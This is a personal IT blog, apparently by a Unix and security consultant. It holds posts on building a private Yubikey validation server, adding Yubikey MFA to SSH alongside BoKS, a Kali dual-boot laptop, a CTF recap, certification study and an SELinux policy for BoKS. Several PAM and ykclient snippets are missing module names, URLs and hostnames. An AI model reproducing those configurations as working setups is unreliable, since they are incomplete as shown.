Now is your chance to finally get started on all those things you've been meaning to learn and study! Make sure to plan a few hours every day to spend on research and studies. This will also help you maintain your workday rhythm. 


Meet new people

Of course you're going job hunting! Putting that aside though, I've found it tremendous to also go and meet people in my business just for the heck of it. Some would call this networking, I just call it fun :)

Why not visit one of your industry's convention, now that you have the time? Or use to find social gatherings that look interesting or beneficial. Every week there's something you could help out with or learn about.



And you know what? Relish your downtime! Get some exercise, go for a walk, enjoy the scenery. Feeling ambitious and feeling the urge to start running? Give the famous "Couch to 5k" schedule a shot! Not thinking about work a few hours may help you a bit in pushing harder when you need to!


What have I been doing?

I've spent a few days learning a new programming language (Python in my case) by signing up for Codecademy. I've also spent a few days learning about MFA tokens and on integrating those with software I'm already familiar with. And now I'm also hitting the books on Oracle and SQL. 

I've hit the Blackhat Europe convention and learned a lot of new things. I'll also be meeting with people from a big-name college and with an IT service provider. Both talks could perhaps lead to something in the future, but for now I simply want to learn about their activities.  


And after all that hard work-that's-not-actually-work? I'm deflating by taking some walks around town and by playing a game or two. I really ought to thank my employer for this great "work-cation". tags: ,

View or add comments (curr. 0)

Integrating FoxT BoKS ServerControl with Yubikey (MFA) authentication

2015-11-17 10:03:00

As promised, I’ve put some time into integrating the Yubikey Neo that I was gifted with Fox Technologies BoKS.  For those who are not familiar with BoKS, here’s a summary I once wrote. I’ve always enjoyed working with BoKS and I do feel that it’s a good solution to the RBAC-problems we may have with Linux and Windows servers. So when I was gifted a Yubikey last week, I couldn’t resist trying to get it to work with BoKS.

My first order of business was to set up a local, private Yubikey validation infrastructure. This was quickly followed by using an LDAP server to host both user account data and Yubikey bindings (like so). And now follows the integration with BoKS!


Yubikey and BoKS: it takes a little work

The way I see it, there’s at least three possible integration solutions that us “mere mortals” may achieve. There are definitely other ways, but they require access to the BoKS sources which we won’t get (like building a custom authenticator method that uses YKCLIENT).

  1. Adjust your software to use both Yubikey and then PAM to use BoKS.
  2. Adjust your software to use PGP/SSH keys stored on Yubikey.
  3. Adjust your software to authenticate against Kerberos, which in turn uses Yubikey OTP. BoKS allows Kerberos authentication by default.

Putting this into a perspective most of us feel comfortable with, SSH, this would lead to:

  1. Run a second SSH daemon next to the BoKS-provided SSH. This second daemon will only allow Yubikey+password MFA logins and is only accessible to a select group of people. This requires the definition of a custom access method and some PAM customizations.
  2. A solution like this, with PGP/SSH keys.
  3. Using BoKS-sshd, together with the Kerberos authentication method defined by BoKS

In my testing environment I’ve gotten solution #1 to work reliably. The next few paragraphs will describe my methods.



The following assumes that you already have:

All the changes described will need to be made on all your BoKS systems. The clients running the special SSH daemon with Yubikey support will need the PAM files as well as all the updates to the BoKS configuration files. The master and replicas will technically not need the changes you make to the SSH daemon and the PAM files, unless they will also be running the daemon. Of course, once you've gotten it all to run correctly, you'd be best off to simply incorporate all these changes into your custom BoKS installation package!


Let’s build a second daemon

BoKS provides it’s own fork of the OpenSSH daemon and for good reason! They expanded upon its functionality greatly, by allowing much greater control over access and fine-grained logging. With BoKS you can easily allow someone SCP access, without allowing shell access for example. One thing FoxT did do though, is hard-disable PAM for this custom daemon. And that makes it hard to use the pam_yubico module. So what we’ll do instead, is fire up another vanilla OpenSSH daemon with custom settings.

Downside to this approach is that you lose all fine-grained control that BoKS usually provides over SSH. Upside is that you’re getting a cheap MFA solution :) Use-cases would include your high-privileged system administrators using this daemon for access (as they usually get full SSH* rights through BoKS anyway), or employees who use SSH to specifically access a command-line based application which requires MFA.

The following commands will set up the required configuration files. This list assumes that BoKS is enabled (“sysreplace replace”), because otherwise the placement of the PAM files would be slightly different.

I’ve edited /etc/ssh/yubikey-sshd_config, to simply adjust the port number from “22” to “2222”. Pick a port that’s good for you. At this point, if you start “/usr/sbin/yubikey-sshd -f /etc/ssh/yubikey-sshd_config” you should have a perfectly normal SSH with Yubikey authentication running on port 2222.

You can ensure that only Yubikey users can use this SSH access by adding “AllowGroups yubikey” to the configuration file (and then adding said Posix group to the relevant users). This ensures that access doesn’t get blown open if BoKS is temporarily disabled.

Finally, we need to adjust the PAM configuration so yubikey-sshd starts using BoKS. I’ve changed the /etc/opt/boksm/pam.d/yubikey-sshd file to read as follows:

auth      required
auth      required mode=client ldap_uri=ldap:/// ldapdn= user_attr=uid yubi_attr=yubiKeyId id= key= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth      required
account   required
account   required
password  required
# close should be the first session rule
session   required close
session   required
session   required
# open should only be followed by sessions to be executed in the user context
session   required open env_params
session   optional force revoke


Caveat: public key authentication

Unless you are running OpenSSH 6.x as a daemon (which is NOT included with RHEL6 / CentOS 6), then you must disable public key authentication in /etc/ssh/yubikey-sshd_config. Otherwise, the pubkey authentication will take precedent and the Yubikey will be completely bypassed.

So, edit yubikey-sshd_config to include:


Reconfiguring BoKS

The file /etc/opt/boksm/sysreplace.conf determines which configuration files get affected in which ways when BoKS security is either activated or deactivated. Change the “pamdir” line by appending “yubikey-sshd”:

file pamdir relinkdir,copyfiles,softlinkfiles /etc/pam.d $BOKS_etc/pam.d vsftpd remote login passwd rexec rlogin rsh su gdm kde kdm xdm swrole gdm-password yubikey-sshd

The file /etc/opt/boksm/bokspam.conf ties PAM identifiers into BoKS access methods. Whenever PAM sends something to, this file will help in figuring out what BoKS action the user is trying to perform. At the bottom of this file I have added the following line:

yubikey-sshd   YUBIKEY-SSHD:${RUSER}@${RHOST}->${HOST}, login, login_info, log_logout, timeout

The file /etc/opt/boksm/method.conf defines many important aspects of BoKS, including authentication and access “methods”. The elements defined in this file will later appear in “access routes” (BoKS-lingo for rules). At the bottom of this file I have added, which is a modification of the existing SSH_SH method:

METHOD YUBIKEY-SSHD:  user@host->host,    -prompt, timeout, login, noroute, @-noroute, usrqual, uexist, add_fromuser

By now it’s a good idea to restart your adjusted SSH daemon and BoKS. Check the various log files (/var/log/messages, /var/opt/boksm/boks_errlog) for obvious problems.


Assigning access

My user account BoKS.MGR:thomas has userclass (BoKS-speak for “role”) “BoksAdmin”. I’ve made two changes to my account (which assumes that group “yubikey” already exists):

This leaves me as follows:

[root@master ~]# lsbks -aTl *:thomas
Username:                     BOKS.MGR:thomas
User ID:                      501
User Classes:                 BoksAdmin
Group ID:                     501
Secondary group ID's:         505 (ALL:yubikey)
Assigned authenticator(s):    ssh_pk
Assigned Access Routes via User Classes
BoksAdmin                     login:*->BOKS.MGR 00:00-00:00, 1234567
                              su:*->root@BOKS.MGR 00:00-00:00, 1234567
                              yubikey-sshd:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567
                              ssh*:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567


Proof: Pam_yubico works with pam_BoKS

The screenshot below shows two failed login attempts by user Sarah, who does have a Yubikey but who lacks the Posix group “yubikey”. Below is a successful login by user Thomas who has both a Yubikey and the required group.

yubikey BoKS ssh login failure

The screenshot below shows a successful login by myself, with the resulting BoKS audit log entry.

yubikey ssh BoKS login success tags: , , ,

View or add comments (curr. 0)

A new project: a private Yubikey server infrastructure

2015-11-14 20:48:00

I was recently gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Ubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

I've been playing with the YK for two days now and I've managed to get the following working quite nicely:

I have written an extensive tutorial on how I built the above. In the near future you may expect expansions, including tie-in to LDAP as well as BoKS. tags: , ,

View or add comments (curr. 0)

Building a local Yubikey server infrastructure

2015-11-13 23:05:00

I recently was gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Ubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

In the next few paragraphs I will explain how I built the following:

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.


Yubikey infrastructure: how does it all work?

Generally speaking, any system that runs authentication based on Yubikey products, will communicate with the YubiCloud, e.g. the Yubico servers. In a corporate environment this isn’t desirable, which is why Yubico have created an open source, on-premises solution consisting of two parts: ykval and ykksm.

yubikey infrastructure

Any product desiring to use YK authentication will contact the ykval server to verify that the card in question is indeed valid and used by the rightful owner. To achieve this, ykval will contact the ykksm server and attempt to perform an encryption handshake to see if the card truly matches the expected signatures.

Yubico provide open source tools and APIs that help you build YK authentication into your software. In the case of SSH (and other Unix tools), all of this can be achieved through PAM. There are many different options of authenticating your SSH sessions using a Yubikey and I’ve opted to go with the easiest: the OTP, one-time-password, method. I’m told that you can also use YK in a challenge/response method with later versions of OpenSSH. It’s also possible to actually use your YK as a substitute for your SSH/PGP keys.


Caveat: AES keys

The AES keys stored in YKKSM cannot be the ones associated with your Yubikey product when they leave the factory. Yubico no longer make these keys available to their customers. Thus, in order to run your own local Yubikey infrastructure, you will be generating your own AES keys and storing them on the Yubikey.


Caveat: OpenSSH versions

My whole project revolves around using CentOS 6.7. Red Hat have made certain choices with regards to upgrading and patching of the software that’s part of RHEL and thus 6.x “only” runs OpenSSH 5.2. This means that a few key features from OpenSSH 6.2 (which are great to use YK as optional MFA) are not yet available. Right now we’re in an all-or-nothing approach :)


Caveat: SELinux and Yubikey


If we have SELinux enabled, it has been suggested that the following tweaks will be needed:



On the server(s) you will need to install the following packages through Yum: git-core httpd php mysql-server make php-curl php-pear php-mysql wget help2man mcrypt php-mcrypt epel-release. After making EPEL available, also install “pam_yubico” and “ykclient” through Yum.

On the client(s) you will only need to install both “epel-release” and “pam_yubico” (through EPEL). Installing “ykclient” is optional and can prove useful later on.

On the server(s) you will need to adjust /etc/sysconfig/iptables to open up ports 80 and 443 (https is not included in my current documentation, but is advised).


Installation of the server:

EPEL has packages available for both the ykval and the ykksm servers. However, I have chosen to install the software through their GIT repository. Pulling a GIT repo on a production server in your corporate environment might prove a challenge, but I’m sure you’ll find a way to get the files in the right place :D

First up, clone the GIT repos for ykval and ykksm:


A few tweaks are now needed:

From this point onwards, you may work your way through the vendor-provided installation guides:

  1. Install guide for YKKSM (also included in GIT)
  2. Install guide for YKVAL (also included in GIT)

More tweaks are needed once you are finished:

Restart both MySQL and Apache, to make sure all your changes take effect.


Initial testing of the infrastructure

We have now reached a point where you may run an initial test to make sure that both ykval and ykksm play nicely. First off, you may register a new client API key, for example:

$ ykval-gen-clients --urandom --notes "Client server 2"

This has registered client number 5 (“id”) with the API key “b82PeHfKWVWQxYwpEwHHOmNTO6E=”. Both of these will be needed in the PAM configuration later on. Of course you may choose to reuse the same ID and API key on all your client systems, but this doesn’t seem advisable. It’s possible to generate new id-key pairs in bulk and I’m sure that imaginative Puppet or Chef administrators will cook up a nice way of dispersing this information to their client systems.

You can run the actual test as follows. You will recognize the client ID (“5”) and the API key from before. The other long string, starting with “vvt…” is the output of my Yubikey. Simply tap it once to insert a new string. The verification error shown below indicates that this OTP has already been used before.

$ ykclient —url "" --apikey b82PeHfKWVWQxYwpEwHHOmNTO6E=
     5 vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv --debug
  validation URL:
  client id: 5
  token: vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv
  api key: b82PeHfKWVWQxYwpEwHHOmNTO6E=
Verification output (2): Yubikey OTP was replayed (REPLAYED_OTP)

For the time being you will NOT get a successful verification, as no Yubikeys have been registered yet.


Registering user keys

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

As I mentioned before, you cannot retrieve the AES key for your Yubikey to include in the local KSM. Instead, you will be generating new keys to be used by your end-users. There’s two ways to go about this:

In either case you will need to so-called Yubikey Personalization Tools, available for all major platforms. Using this tool you will either input or generate and then store the new key onto your Yubikey.


yubikey personalization tools


The good thing about the newer Yubico hardware products is that they have more than one “configuration slot”. By default, the factory will only fill slot 1 with the keys already registered in YubiCloud. This leaves slot 2 open for your own use. Of course, slot 1 can also be reused for your own AES key if you so desire.

It’s mostly a matter of user friendliness:

In my case I’ve generated the new key through the Personalization Tool and then inserted it into the ykksm database in the quickest and dirtiest method: through MySQL.

$ mysql
USE ykksm;
INSERT INTO yubikeys VALUES (3811938, “vvtblilljglk”, “”, "783c8d1f1bb5",
"ca21772e39dbecbc2e103fb7a41ee50f", "00000000", "", 1, 1);

The fields used above are as follows: `serialnr`, `publicname`, `created`, `internalname`, `aeskey`, `lockcode`, `creator`, `active`, `hardware`. The bold fields were pulled from the Personalization Tool, while the other fields were left default or filled with dummy data. (Yes, don’t worry, all of this is NOT my actual security info)


Further testing, does the Yubikey work?

Now that both ykval and ykksm are working and now that we’ve registered a key, let’s see if it works! I’ve run the following commands, all of which indicate that my key does in fact work. As before, the OTP was generated by pressing the YK’s sensor.

$ wget -q -O - ‘http://localhost/wsapi/decrypt?otp=vvtblilljglkkgccvhnrvtvghjvrtdnlbrugrrihhuje'
OK counter=0001 low=75e6 high=fa use=03


$ ykclient —url “" --apikey 6YphetClMU1mKme5FrblQWrFt8c=
     4 vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc --debug
validation URL:
client id: 4
token: vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc
api key: 6YphetClMU1mKme5FrblQWrFt8c=
Verification output (0): Success


Making OpenSSH use Yubikey authentication

As I’ve mentioned before, for now I’m opting to use the Yubikey device in a very simple manner: as a second authenticator factor (MFA) for my SSH logins. We will setup PAM and OpenSSH in such a way that any SSH login will first prompt for a Yubikey OTP, after which it will ask for the actual user’s password.

Create /etc/yubikey. This file maps usernames to Yubikey public names, using the following format:

thomas:vvtblilljglk          # :

The great news is that Michal Ludvig has proven that you may also store this information inside LDAP, which means one less file to manage on all your client systems!

Edit /etc/pam.d/sshd and change the AUTH section to include the Yubico PAM module, as follows. Substitute   for the fully qualified hostname assigned to the ykval web server.

auth       required
auth       required mode=client authfile=/etc/yubikey id=5 key=b82PeHfKWVWQxYwpEwHHOmNTO6E= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth       include      password-auth

Finally edit /etc/ssh/sshd_config and change the following values:

PasswordAuthentication no
ChallengeResponseAuthentication yes

Restart the SSHD and you should be golden!



When it comes to either ykksm or ykval full logging is available through Apache. If you’ve opted to use the default log locations as outlined in the respective installation guides, then you will find the following files:

[root@master apache]# ls -al /var/log/apache
-rw-r--r--   1 root root 15479 Nov 13 21:53 ykval-access.log
-rw-r--r--   1 root root 36567 Nov 13 21:53 ykval-error.log

These will contain most of the useful messages, should either VAL or KSM misbehave.


Video: registering a new key and using it




Aside from all the pages I’ve linked to so far, a few other sites stand out as having been tremendously helpful in my quest to get all of this working correctly. Many thanks go out to: tags: , , ,

View or add comments (curr. 0)

A cheap laptop as pen-testing portable: Lenovo Ideapad s21e-20 and Kali

2015-10-07 15:00:00

the Lenovo Ideapad s21e-20 Windows 8

In preparation of the recent PvIB penetration testing workshop, I was looking for a safe way to participate in the CTF. I was loathe of wiping my sole computer, my Macbook Air and I also didn't want to use my old Macbook which is now in use as Dana's plaything. Luckily my IT Gilde buddy Mark Janssen had a great suggestion: the Lenovo Ideapad s21e-20. gave it a basic 6,0 out of 10 and I'd agree: it's a very basic laptop at a very affordable price. At €180 it gives me a wonderfully portable system (light and good formfactor), with a decent 11.6" screen, an okay keyboard and too little storage. Storage is the biggest issue for the purposes I had in mind! Biggest annoyance is that the touchpad doesn't work under Linux without lots of fidgetting.

I wanted to retain the original Windows 8 installation on the system, while allowing it to dual-boot Kali Linux. In order to get it completely up and running, here's the process I followed. You will need a bunch of extra hardware to get it all up and running.

So here we go!

  1. Unbox and install as usual. Walk through the complete Windows setup.
  2. Feel free to plug the SDHC microSD card into the storage slot of the laptop. You won't be using it for now, but that way you won't lose it. 
  3. Under Windows Update, disable the optional update for the Windows 10 installer. You don't have enough space for Windows 10 anyway. Then run all required updates, to keep things safe.
  4. Configure Windows as desired :)
  5. Using the partitioning and formatting tool of Windows, cut your C: drive by 1.5GB. Create a new partition on the free space created thusly. 
  6. Download the Kali Linux 32-bit live CD.
  7. Get a tool like Rufus and burn the Kali ISO to the external USB drive.
  8. Restart into UEFI, by using the advanced options menu of the Windows restart. Windows key -> Power icon -> shift-click "restart" -> advanced -> UEFI.
  9. In UEFI go to the "boot" tab. Set the boot mode to "Legacy Support", boot priority to "Legacy first" and USB boot to "enabled". 
  10. Save, then plugin the Wifi dongle on the other USB port and reboot. Boot Kali from the USB drive. 
  11. Once you've booted to the desktop, you're stuck without a mouse :p Press the Windows Flag key on your keybard to popup the search bar. Type "install" and start the Kali installer. 
  12. The installer starts in a new window, but it will only be partially visible! You'll need to navigate using the arrow keys and you'll need to make a few good guesses. For most questions you can use the default value as provided, or confirm the required information using the Enter key.
  13. If you would like to change your Location, the bottom-most option in the list is "Other" which will allow you to select "Europe" and so on.
  14. Once you reach the "Partition disks" screen, choose "Manual".
  15. Your internal storage is /dev/mmcblk0, while the SDHC card in the slot will be /dev/mmcblk1. Ensure that the 1.5GB partition on blk0 is made into /boot as ext4. Also partition the SDHC card to have at least 20GB of / as ext4 and swap (4GB). If desired you may also create a third partition as FAT32, so you can have more scratch space to exchange files between Windows and Linux. 
  16. The bottom-most option in the partitioning screen is "save and continue". Do not mess with TAB etc. Once you're done with the partition tables, just push the down arrow until it keeps beeping and press Enter.
  17. Once asked where to install GRUB, just chuck it on the /dev/mmcblk0 MBR. This kills the Windows 8 default bootloader, but Windows will work just fine. 
  18. Finish the installation by answering the rest of the questions.
  19. Shutdown the laptop, unplug the USB drive and replace it with your USB mouse. Poweron the laptop and boot Kali.

The good thing is that you won't need to mess around with extra settings to actually boot from the SDHC card! On older Ideapad laptops this was a lot of hassle and required extra work to boot from SD

Now, we're almost there!

  1. Follow these instructions to allow GRUB to boot Windows again. At the end use the update-grub command instead of grub2-mkconfig. Use fdisk -l /dev/mmcblk0 to find which partition you need to at to 15_Windows. In my case it was hd0,1. That's the EFI partition. You can reboot to verify that Windows boots again. It will complain that "no operating system was found", but Windows will boot just fine!
  2. The guys at blackMORE Ops have created a nice article titled "20 Things to do after installing Kali Linux". A lot of these additions are very nice, feel free to follow them. 
  3. Follow the Debian Wiki instructions on setting up the WL drivers for the BCM43142 onboard wifi card. Reboot afterwards and unplug the USB wifi dongle before starting back into Linux. Your onboard wifi will now work!
  4. If, like me, you appreciate your night vision go ahead and install F.Lux for Linux. In my case I start it up with: xflux -l 52.4 -g 5.3 -k 2600. You can put that in a small script and include it with the startup scripts of Gnome.  

And there we have it! Your Ideadpad s21e is now dual-booting Windows 8 and Kali Linux. Don't forget to clone the drives to a backup drive, so you won't have to redo all of these steps every time you visit a hacking event :) Just clone the backup back onto the system afterwards, to wipe your whole system (sans UEFI and USB controllers). tags: , , , ,

View or add comments (curr. 0)

PvIB Pen.Testing workshop

2015-10-07 06:32:00

The CTF site

Last night I attended PvIB's annual pen-testing event with a number of friends and colleagues. First impressions? It's time for me to enroll as member of PvIB because their work is well worth it!

In preparation to the event I prepared a minimalistic notebook computer with a Windows 8 and Kali Linux dual-boot. Why Kali? Because it's a light-weight and cross-hardware Linux installer that's chock-full of security tools! Just about anything I might need was pre-installed and anything else was an apt-get away. 

Traveling to the event I expected to do some networking, meeting a lot of new people by doing the rounds a bit while trying to pick up tidbits from the table coaches going around the room. Instead, I found myself engrossed in a wonderfully prepared CTF competition. In this case, we weren't running around the conference hall, trying to capture each other's flags :D The screenshot above shows how things worked:

  1. Each participant would register an account on
  2. Your personal dashboard showed the available challenges, each worth a number of points.
  3. Supposedly easy challenges would net you 50-100 points, while big ones would net 250, 500 or even 1000!
  4. Each challenge would result in a file or piece of text, which one needed to MD5 and then submit through the dashboard.

I had no illusions of my skillset, so I went into the evening to have fun, to learn and to meet new folks. I completely forgot to network, so instead I hung out with a great group of students from HS Leiden, all of whom ended up really high in the rankings. While I was poking around 50-200 point challenges, they were diving deeply into virtual machine images searching for hidden rootkits and other such hardcore stuff. It was great listening to their banter and their back-and-forth with the table coach, trying to figure out what the heck they were up to :)

I ended up in 49th place out of 85 participants with 625 points. That's mostly middle of the pack, while the top 16 scored over 1400 (#1 took 3100!!) and the top 32 scoring over 875. 

Challenges that I managed to tackle included:

Together with Cynthia from HSL, we also tried to figure out:

The latter was a wonderful test and we almost had it! Using various clues from the web, which involved multiple steganography tools provided by Alan Eliason, ImageMagick and VLC. We assumed it was a motion-jpeg image with differences in the three frames detected, but that wasn't it. Turns out it -was- in fact steganography using steghide.

Ironically the very first test proved very annoying to me, as the MD5 sum of the string I found kept being rejected. It wasn't until our coach hinted at ending NULL characters that I switched from "cat $FILE | md5sum" to "echo -n $STRING | md5sum". And that's what made it work. 

To sum things up: was I doing any pen-testing? No. Did I learn new things? Absolutely! Did I have a lot of fun? Damn right! :) tags: , , , ,

View or add comments (curr. 0)

My first foray into pen-testing

2015-09-30 18:23:00

A few days ago, my buddies at IT Gilde were issued a challenge by the PvIB (Platform voor Informatie Beveiliging), a dutch platform for IT security professionals. On October 6th, PvIB is holding their annual pen-testing event and they asked us to join in the fun. I've never partaken in anything of the sorts and feel that, as long as I keep calling myself "Unix and Security consultant", I really ought to at least get introduced to the basics of the subject :)

So here we go! I'm very much looking forward to an evening full of challenges! 

The PvIB folks warn to not have any sensitive or personal materials on the equipment you'll use during the event, so I went with Mark Janssen's recommendation and bought a cheap Lenovo S21e-20 notebook. I'll probably upgrade that thing to Windows 10 and load it up with a wad of useful tools :) tags: , , ,

View or add comments (curr. 0)

Some hard work that I need to pull through!

2015-09-30 17:51:00

Aside from my day to day activities in the fields of Unix/Linux and security, I want to ensure that I keep up with relevant and useful skills. I believe that expanding my horizons and keeping up with tech outside of my usual activities is a very useful activity. As the proverbial "big stick" I challenged myself to achieve two professional certifications this year:

  1. Oracle Certified Associate, for Oracle 11. Many of my activities so far have touched on databases, but my current project's the first time that I've had to actually dive into them. I would like to actually know something about the stuff I'm working with, hence I'd like to achieve at least a basic set of Oracle DBA skills. 
  2. Puppet Professional. Puppet's one of the more recent techs that I feel has a huge future. As the saying goes "I want me some of that!". While I have no current need for Puppet, I am keen to soon get started on a Puppet job!

Of course, the year isn't very long anymore, so I'd better get cracking! tags: ,

View or add comments (curr. 0)

Puppet Practitioner course completed

2015-06-24 20:03:00

The past few months I've been hearing more and more about Puppet, software that allows for "easy" centralized configuration management for your servers. Monday through Wednesday were spent getting familiar with the basics of the Puppet infrastructure and of how to manage basic configuration settings of your servers. It was an exhausting three days and I've learned a lot!

The course materials assumed that one would make use of the teacher's Puppet master server, while having a practice VM on their own laptop (or on the lab's PC). As I'm usually pretty "balls to the wall" about my studying, I decided that wasn't enough for me :p

Over the course of these three days I've set up a test environment using multiple VMs on my Macbook, running my own Puppet master server, two Linux client systems and a Windows 8 client system. The Windows system provided the most challenges to me as I'm not intimately familiar with the Windows OS. Still, I managed to make all of the exercises work on all three client systems! 

Many thanks to the wonderful Ger Apeldoorn for three awesome days of learning! tags: , , ,

View or add comments (curr. 0)

First attempt at SQL exam: did not pass

2015-06-19 07:59:00

After roughly three months of studying (at night and on the train) I took a gamble: last night I took my Oracle SQL exam 1Z0-051. Along the way I've learned two things:

  1. The contents of the exam are rather different (and more difficult!) from the practice exams and study materials that came with the two books I have.
  2. It's not a good idea to attempt the online exam at 23:00, after a long day of work and an evening of studying :D

I'm going to "deflate" for a few weeks before continuing my studies. I really, really want to achieve my OCA before the end of the year, so I'd better get a hurry on after that.

But first, my first three days of Puppet training! More exciting new things to learn! tags: ,

View or add comments (curr. 0)

Branching out, learning about databases

2015-03-01 13:52:00

Since achieving my RHCE last November I've taken things easy: for three months I've done nothing but relaxing and gaming to wind down from the big effort. But now it's time to pick up the slack again!

Over the past years I've worked with many Unix systems and I've also worked with with monitoring, deployment and security systems. However, I've never done any work with databases! And that's changed now that I'm in a scrum team that manages an application which runs on Websphere and Oracle. So here I go! I really want to know what I'm working with, instead of just picking up some random terms left and right. 

Starting per March, I'm studying Oracle 11. And to keep myself motivated I've set myself the goal of achieving basic Oracle certification, which in this case comes in the shape of the OCA (Oracle Certified Associate). The certification consists of two exams: a database technology part and an SQL part, the latter of which may be taken online.

This is going to be very challenging for me, as I've never been a good programmer. Learning SQL well enough to write the small programs associated with the exam is going to be exciting but hard :) tags: ,

View or add comments (curr. 0)

Passed my RHCE

2014-11-11 09:16:00

Snoopy is happy

Huzzah! I passed, with a score of 260 out of 300... That makes it roughly 87%, which is an excellent ending to four months of hard prepwork.

The great thing is that I'm now able to rack up 85 CPE for my CISSP! 25 points in domain A and 60 points in domain B, which means that my CISSP renewal for this year and the next two is a basic shoe-in. Of course, I'll continue my training and studies :)

My RHCE experience was wonderful. Like last year with my RHCSA, I took the Red Hat Kiosk exam in Utrecht.

A while back I was contacted by Red Hat, to inform me I'm a member Red Hat 100 Kiosk Club which basically means that I'm one of the first hundred people in Europe to have taken a Kiosk exam. As thanks for this, they offered me my next Kiosk exam for free, which was yesterday's RHCE. Nice!

The exam was slated for 10:00, I showed up at 09:30. The reception at BCN in Utrecht was friendly, with free drinks and comfy seats to wait. The Kiosk setup was exactly as before, save the slot for my ID card which was already checked at the door. The keyboard provided was pretty loud, so I'm sorry to the other folks taking their exams in the room :)

All in all I came well prepared, also with thanks to my colleagues for sharing another trial exam with me. tags: , ,

View or add comments (curr. 0)

Let's do this!

2014-11-09 15:15:00

RHCE exam in 18 hours

If I'm not ready by now, nothing much will help :)

Looking forward to taking the RHCE exam tomorrow and whichever way it goes, I'm also looking forward to the SELinux course I'll be taking at IT Gilde tomorrow night. tags: , ,

View or add comments (curr. 0)

RHCE exams, here I come

2014-07-29 21:32:00

Yes, this blog has been quiet for quite a while. In part this is because I've put most of my private stuff behind logins, but also because I've had my professional development on a backburner due to my book translation. 

But now I've started studying for my RHCE certification. A year ago (has it been that long?!) I achieved my RHCSA, which I'll now follow up with the Engineer's degree. Red Hat will still offer the RHEL6 exams until the 19th of december, so I'd better get my ass in gear :) tags: , ,

View or add comments (curr. 0)

F.Lux on Linux: oh happy day!

2014-07-29 21:27:00

Oh happy day! I've been using F.Lux on my Macs for years now and my eyes thank me for it. This great piece of software will automatically adjust the color temperature of your computer's screen, based on your location and light in your surroundings. 

During the day your screen's white will be white, but in the evenings it'll slowly turn much more orange. During this change you won't even notice it's happening, but the end result is awesome. You'll still be seeing "white" but with much less eyestrain. Even better: supposedly the smaller amount of blue light will help in falling asleep later on. 

Now that I've started studying for my RHCE exams, I'm working extensively on CentOS again. Hellooooo bright light! 

But not anymore. Turns out that xflux is a thing! It's a Linux daemon that quite literally is F.Lux, for Linux. No more burnt out corneas! tags: , ,

View or add comments (curr. 0)

Running BoKS on SELinux protected servers

2013-10-01 09:00:00

I have moved the project files into GITHub, over here

FoxT Server Control (aka BoKS) is a product that has grown organically over the past two decades. Since its initial inception in the late nineties it has come to support many different platforms, including a few Linux versions. These days, most Linuxen support something called SELinux: Security Enhance Linux. To quote Wikipedia:

"Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides the mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). It is a set of kernel modifications and user-space tools that can be added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement.

Basically, SELinux allows you to very strictly define which files and resources can be accessed under which conditions. It also has a reputation of growing very complicated, very fast. Luckily there are resources like Dan Walsh' excellent blog and the presentation "SELinux for mere mortals".

Because BoKS is a rather complex piece of software, which dozens of binaries and daemons all working together across many different resources, integrating BoKS into SELiinux is very difficult. Thus it hasn't been undertaken yet and thus BoKS will not only require itself to be run outside of SELinux' control, it actually wants to have the software fully disabled. So basically you're disabling one security product, so you can run another product that protects other parts of your network. Not so nice, no?

So I've decided to give it a shot! I'm making an SELinux ruleset that will allow the BoKS client software to operate fully, in order to protect a system alongside SELinux. BoKS replicas and master servers are even more complex, so hopefully those will follow later on. 

I've already made good progress, but there's a lot of work remaining to be done. For now I'm working on a trial-and-error basis, adding rules as they are needed. I'm foregoing the use of sealert for now, as I didn't like the rules it was suggesting. Sure, my method is slower, but at least we'll keep things tidy :)

Over the past few weeks I've been steadily expanding the boks.te file (TE = Type Enforcement, the actual rules):

v0.32 = 466 lines
v0.34 = 423 lines
v0.47 = 631 lines
v0.52 = 661 lines 
v0.60 = 722 lines 
v0.65 = 900+ lines 

Once I have a working version of the boks.te file for the BoKS client, I will post it here. Updates will also be posted on this page.


Update 01/10/2013:

Looks like I've got a nominally working version of the BoKS policy ready. The basic tests that I've been performing are working now, however, there's still plenty to do. For starters I'll try to get my hands on automated testing scripts, to run my test domain through its paces. BoKS needs to be triggered to just about every action it can, to ensure that the policy is complete.


Update 19/10/2013:

Now that I have an SELinux module that will allow BoKS to boot up and to run in a vanilla environment, I'm ready to show it to the world. Right now I've reached a point where I can no longer work on it by myself and I will need help. My dev and test environment is very limited, both in scale and capabilities and thus I can not test every single feature of BoKS with this module. 

I have already submitted the current version of the module to FoxT, to see what they think. They are also working on a suite of test scripts and tools, that will allow one to automatically run BoKS through its paces which will speed up testing tremendously. 

I would like to remind you that this SELinux module is an experiment and that it is made available as-is. It is absolutely not production-ready and should not be used to run BoKS systems in a live environment. While most of BoKS' basic functions have been tested and verified to work, there are still many features that I cannot test in my current dev environment. I am only running a vanilla BoKS domain. No LDAP servers, no Kerberos, no other fancy features. 

Most of the rules in this file were built by using the various SELinux troubleshooting tools, determining what access needs to be opened up. I've done it all manually, to ensure that we're not opening up too much. So yeah: trial and error. Lots of it. 

This code is made available under the Creative Commons - Attribution-ShareAlike license. See here for full details. You are free to Share (to copy, distribute and transmit the work), to Remix (to adapt the work) and to make commercial use of the work under the following conditions:

So. How to proceed? 

  1. Build a dev/test environment of your own. I'm running CentOS VMs using Parallels Destop on my Macbook. Ensure that they're all up to date and that you include SELinux with the install. Better yet, check the requirements on this page
